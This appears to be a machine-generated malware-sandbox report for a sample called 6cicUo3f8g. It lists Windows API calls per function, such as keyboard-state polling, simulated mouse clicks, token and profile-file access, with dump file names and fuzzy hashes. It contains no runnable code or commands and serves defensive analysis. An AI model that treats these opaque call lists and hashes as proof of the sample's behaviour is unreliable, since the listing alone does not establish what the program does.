• GetProcAddress.KERNEL32(00000000,?), ref: 0095DA07
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0095DA21
  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947896,?,?,00000000), ref: 008E5A2C
  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947896,?,?,00000000,?,?), ref: 008E5A50
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: ea0d8a6db920c017e9adf6534dc6ef5981ec4c8bae69661d4754f7da396f9167
• Instruction ID: 2116c7a2b83974ae0682450b0d493a52f132d6c51c42394a272d65e82bb5208c
• Opcode Fuzzy Hash: ea0d8a6db920c017e9adf6534dc6ef5981ec4c8bae69661d4754f7da396f9167
• Instruction Fuzzy Hash: 7C517835A05209DFCB10EFA9D4949ADB7F8FF0A324B048069E859AB322D770ED45CF81
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0094E61F
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0094E648
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0094E687
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0094E6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0094E6B4
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 32d0c0055bac97a5ad9cc83f76e9b9688e86ba28a1c63ba064ad1b867807482d
• Instruction ID: 9cac282d0193c01c37776bdc8dab423737082b0ab04b5391716a5a10e5058542
• Opcode Fuzzy Hash: 32d0c0055bac97a5ad9cc83f76e9b9688e86ba28a1c63ba064ad1b867807482d
• Instruction Fuzzy Hash: 12511735A00215AFCB00EF69C981AADBBF5FF49314F1480A9E859AB362CB71ED10DB51
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a46f6f6d92372ea6b3ba3fe8dac4fde811bc1e3a3349529330008985514185a
• Instruction ID: 4cb4f0ac54411c82077ad80f43322803260038bb75c76e16743f227c2a4ac7d2
• Opcode Fuzzy Hash: 9a46f6f6d92372ea6b3ba3fe8dac4fde811bc1e3a3349529330008985514185a
• Instruction Fuzzy Hash: 0E41C33590C104AFD720DF28DC58FA9BBA8EB0B360F160565F916B72E1CB74AD41EE91
APIs
• GetCursorPos.USER32(?), ref: 008E2357
• ScreenToClient.USER32(009A57B0,?), ref: 008E2374
• GetAsyncKeyState.USER32(00000001), ref: 008E2399
• GetAsyncKeyState.USER32(00000002), ref: 008E23A7
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 1c8b0314474941a6f74b3208da5c4a75f04a43a6ec4851f889a6ec11cff6bdbe
• Instruction ID: faf3744c22f310fa2396e6f82b68f5a407b9c2fb1c2318ea5b2fd0b53d3d3012
• Opcode Fuzzy Hash: 1c8b0314474941a6f74b3208da5c4a75f04a43a6ec4851f889a6ec11cff6bdbe
• Instruction Fuzzy Hash: 9E417175608109FBCF159F69CC44AE9BB79FB06364F20435AF829D22A0C7349D90DF91
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009363E7
• TranslateAcceleratorW.USER32(?,?,?), ref: 00936433
• TranslateMessage.USER32(?), ref: 0093645C
• DispatchMessageW.USER32(?), ref: 00936466
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00936475
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
• Opcode ID: ceed11d707b1ef744e90ef02491a9fbedd58b928586baf566ca61484671fad61
• Instruction ID: e342415079258badcff1e0f8795f2711fb117f5f6506843c211aae5288ad0233
• Opcode Fuzzy Hash: ceed11d707b1ef744e90ef02491a9fbedd58b928586baf566ca61484671fad61
• Instruction Fuzzy Hash: CF31A431A18646BFDB248F74DC48BB67BACAF02300F158569E821C31B1E7659855EFA0
APIs
• GetWindowRect.USER32(?,?), ref: 00938A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00938ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00938AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00938AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00938AF8
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 76529b6c58e383e4e1efbed7ec3a6a069a7b442b4c463a8d22338960b488302b
• Instruction ID: 0fa4ed7f11f80aae07f6ab2956ed6ddca4d980604af31c7db6673dff6a41deac
• Opcode Fuzzy Hash: 76529b6c58e383e4e1efbed7ec3a6a069a7b442b4c463a8d22338960b488302b
• Instruction Fuzzy Hash: 7131BC71504219EBDF14CFA8D94CA9F7BB9EB05315F10862AF925EA2D0C7B09914DF90
APIs
• IsWindowVisible.USER32(?), ref: 0093B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0093B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0093B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0093B27F
• _wcsstr.LIBCMT ref: 0093B289
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 90e9a9a8379c38f24c80d37db49c42f8d78e5d5619e182f5d35670f45ecc1beb
• Instruction ID: 4bd5749aa303441e96e3a757021e268cf82d0ef2996aae78bb54c2a0a41a3536
• Opcode Fuzzy Hash: 90e9a9a8379c38f24c80d37db49c42f8d78e5d5619e182f5d35670f45ecc1beb
• Instruction Fuzzy Hash: A321F532608204BAEB159B75DC09F7F7B9CDF99720F10422DF919DA1A1EFA5DC409AA0
APIs
  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
• GetWindowLongW.USER32(?,000000F0), ref: 0096B192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0096B1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0096B1CF
• GetSystemMetrics.USER32(00000004), ref: 0096B1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00950E90,00000000), ref: 0096B216
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: 4ad94a914d0d296497b3c43f4fd047da0501b9523262c3baab697820cff82d5e
• Instruction ID: fd10e5586036b118d4e996dfedf576268ca5cad3859dece23632e822f450efa8
• Opcode Fuzzy Hash: 4ad94a914d0d296497b3c43f4fd047da0501b9523262c3baab697820cff82d5e
• Instruction Fuzzy Hash: 0321A671628251AFCB109F38DC24A6A37A8FB16361F124738F932D71E0F7309890DB90
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00939320
  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00939352
• __itow.LIBCMT ref: 0093936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00939392
• __itow.LIBCMT ref: 009393A3
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: 80aed6066833699a41f7af1b27eceeed8411d1d808bab1ad900ad06839fbb954
• Instruction ID: 9e1ba763c5898e8d21469fa0e81922ee5f721a87e44a7337c4a90e64397f96bc
• Opcode Fuzzy Hash: 80aed6066833699a41f7af1b27eceeed8411d1d808bab1ad900ad06839fbb954
• Instruction Fuzzy Hash: 7C21D771708208BFDB10AA659C85FAE7BADEF89714F044029F905DB1D1D6F0CD459BA2
APIs
• IsWindow.USER32(00000000), ref: 00955A6E
• GetForegroundWindow.USER32 ref: 00955A85
• GetDC.USER32(00000000), ref: 00955AC1
• GetPixel.GDI32(00000000,?,00000003), ref: 00955ACD
• ReleaseDC.USER32(00000000,00000003), ref: 00955B08
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: 001eda91563c0e9362b7a4ed40f572c71d9905bbd0c980d2d716f82a99cc5506
                                                                                                                • Instruction ID: b520681513330b2e5b451088ae1a939fd9c86c0e30fde1a8ec90b0fb5a211449
                                                                                                                • Opcode Fuzzy Hash: 001eda91563c0e9362b7a4ed40f572c71d9905bbd0c980d2d716f82a99cc5506
                                                                                                                • Instruction Fuzzy Hash: F921A175A04104AFDB00EF69DC94A9ABBE5EF89351F148479F849D7362CAB0AD04DB90
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008E134D
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 008E135C
                                                                                                                • BeginPath.GDI32(?), ref: 008E1373
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 008E139C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: 50ef0c768f401a60a565b182660e15f63f1a9b8a1c46bddbd7e195a236bf7164
                                                                                                                • Instruction ID: 905d40151b9b9350f78b8bd66f592c4037b8c9f73ca51588f5839ed2fe778264
                                                                                                                • Opcode Fuzzy Hash: 50ef0c768f401a60a565b182660e15f63f1a9b8a1c46bddbd7e195a236bf7164
                                                                                                                • Instruction Fuzzy Hash: 17217430A18648EFDF11CF1AEC487697BA8FF02765F154219F410D66B0D7B89891EF90
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                • Opcode ID: 457817dbb32b254d9c75ebfa4db3bb974a0b71cf00f55913fbcaa433baf148fa
                                                                                                                • Instruction ID: 7780cba3e453ab1ac6892822bcc259fe3a8b0ee38a6851f3347eaa41d1be7565
                                                                                                                • Opcode Fuzzy Hash: 457817dbb32b254d9c75ebfa4db3bb974a0b71cf00f55913fbcaa433baf148fa
                                                                                                                • Instruction Fuzzy Hash: 3401B5B37001067BD2246B159D42FBFB35CDEA1388F088421FF4996292FB60DE118AA0
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00944ABA
                                                                                                                • __beginthreadex.LIBCMT ref: 00944AD8
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00944AED
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00944B03
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00944B0A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                • String ID:
                                                                                                                • API String ID: 3824534824-0
                                                                                                                • Opcode ID: e2856d1526f94e58f2a696e414adf0dba04cb1510171c411f18abcd3813f89c5
                                                                                                                • Instruction ID: 3fd3b23ce98787363e8cadab45ea9a2885dd9c92b141e1c4649fa7ac040505aa
                                                                                                                • Opcode Fuzzy Hash: e2856d1526f94e58f2a696e414adf0dba04cb1510171c411f18abcd3813f89c5
                                                                                                                • Instruction Fuzzy Hash: D1110876A1D618BBC7008FA8EC08F9F7FACEB46360F154269F824D3250D6B1C90497E0
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0093821E
                                                                                                                • GetLastError.KERNEL32(?,00937CE2,?,?,?), ref: 00938228
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00937CE2,?,?,?), ref: 00938237
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00937CE2,?,?,?), ref: 0093823E
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00938255
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                • Opcode ID: 22531a15e5cb891f0733b8da6be8a6b9a85e2c2978b524d91327ba8ddd3b7908
                                                                                                                • Instruction ID: 9be88cde2c72b61e5c8546d9d385825fd0276f362819c554f0e5101f5f89070c
                                                                                                                • Opcode Fuzzy Hash: 22531a15e5cb891f0733b8da6be8a6b9a85e2c2978b524d91327ba8ddd3b7908
                                                                                                                • Instruction Fuzzy Hash: FF016DB1218608BFDB204FA5EC58D6B7BACFF8A794B50042DF819C2220DAB18C10DA60
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?,?,00937455), ref: 00937127
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937142
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937150
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?), ref: 00937160
                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 0093716C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: 9e9430da2786a5313297f48ac007439dfdbb5fe7f0e902ef624bdb507e0ec932
                                                                                                                • Instruction ID: 384ae29b57aba74126114ebf33486ddf7e8a267efe8904ec1d4d5252e39c37c8
                                                                                                                • Opcode Fuzzy Hash: 9e9430da2786a5313297f48ac007439dfdbb5fe7f0e902ef624bdb507e0ec932
                                                                                                                • Instruction Fuzzy Hash: 1C0171B3619208BBDB214FE4EC44AAABBADEB44791F1400A8FD45D3210D771DD40EBA0
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945260
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0094526E
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945276
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00945280
                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: 8e016810a9afc7dfa7ecdcc75ce1e93dbe6fea0203c32d09f74376668c505b80
                                                                                                                • Instruction ID: 514874c8b12084f9e2f11660f6a2d8dbb4b68c8ea2fc9be773fc58207a95814e
                                                                                                                • Opcode Fuzzy Hash: 8e016810a9afc7dfa7ecdcc75ce1e93dbe6fea0203c32d09f74376668c505b80
                                                                                                                • Instruction Fuzzy Hash: 1E016931D19A1DDBCF00EFE4E858AEDBB78FF09711F42045AE961F2241CBB055509BA1
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00938121
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0093812B
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0093813A
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00938141
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938157
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 84018c6abaf3d74803fc9ce74d61e049c4bcafcfa95254991193007a966d40c7
                                                                                                                • Instruction ID: e95e9f7070619bcdadba63b7118ca1b83910698ff89cb774e3ffef88c4260b9c
                                                                                                                • Opcode Fuzzy Hash: 84018c6abaf3d74803fc9ce74d61e049c4bcafcfa95254991193007a966d40c7
                                                                                                                • Instruction Fuzzy Hash: 3CF062B1218304AFEB110FA5EC98E673BACFF4A794F000029F985C6150CBA19D41EE60
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0093C1F7
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0093C20E
                                                                                                                • MessageBeep.USER32(00000000), ref: 0093C226
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 0093C242
                                                                                                                • EndDialog.USER32(?,00000001), ref: 0093C25C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: c4432e479f7b53cff94c2fe6a7d034bfefd5de43d162923fb3f9c12cb09275e1
• Instruction ID: 2cfa491712aa798e0d2b6fa0c87e62123f216a38cce6b5a8f03938b65a8c8167
• Opcode Fuzzy Hash: c4432e479f7b53cff94c2fe6a7d034bfefd5de43d162923fb3f9c12cb09275e1
• Instruction Fuzzy Hash: 5D01A270418B08ABEB209B64ED5EB9777B8FB00B06F00066DF552A14E0DBE4A9549F90
APIs
• EndPath.GDI32(?), ref: 008E13BF
• StrokeAndFillPath.GDI32(?,?,0091B888,00000000,?), ref: 008E13DB
• SelectObject.GDI32(?,00000000), ref: 008E13EE
• DeleteObject.GDI32 ref: 008E1401
• StrokePath.GDI32(?), ref: 008E141C
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: d7cc52cb73f8835a1d525f29e3c7e986fc2f33a490c0e9f561be9e9596259250
• Instruction ID: 5acaaba44de53d5dd7f002b6776047163ae0777e0123007730ff96c1e01730db
• Opcode Fuzzy Hash: d7cc52cb73f8835a1d525f29e3c7e986fc2f33a490c0e9f561be9e9596259250
• Instruction Fuzzy Hash: 77F0E13012C748EBDB115F1AEC4C7583FA5FB03726F098228E429895F1C7794595EF95
APIs
  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 008E7A51: _memmove.LIBCMT ref: 008E7AAB
• __swprintf.LIBCMT ref: 008F2ECD
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008F2D66
Similarity
• API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 1943609520-557222456
• Opcode ID: f7f154401a25788210b0fd590ea893709d273b769b54528b298c67b77d0a0043
• Instruction ID: c9c454a44d531a8feab7f1cf4ee7b07dc43cfe3fb617c90a5ccdef7faed12b04
• Opcode Fuzzy Hash: f7f154401a25788210b0fd590ea893709d273b769b54528b298c67b77d0a0043
• Instruction Fuzzy Hash: E69159711082559FC714EF28D885D7EBBA8FF86710F10492DF996DB2A2EB20ED44CB52
APIs
  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
• CoInitialize.OLE32(00000000), ref: 0094B9BB
• CoCreateInstance.OLE32(00972D6C,00000000,00000001,00972BDC,?), ref: 0094B9D4
• CoUninitialize.OLE32 ref: 0094B9F1
  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
• Opcode ID: c34acf40d87f6c4a28a438221c79a124913effe114807f3a3ef911221dc87f50
• Instruction ID: fda5633f7d7058b7a9cb7b60ec5916d994b30fd78aaed30db28a58bfdc7b2619
• Opcode Fuzzy Hash: c34acf40d87f6c4a28a438221c79a124913effe114807f3a3ef911221dc87f50
• Instruction Fuzzy Hash: F5A18B756043459FCB04DF19C884D6ABBE5FF8A314F148998F8999B3A2CB31EC45CB92
APIs
• __startOneArgErrorHandling.LIBCMT ref: 009050AD
  • Part of subcall function 009100F0: __87except.LIBCMT ref: 0091012B
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: 60d752684db7a766774439e824a35e5fba1f2cb7619ccadd9010d1cf66fb0297
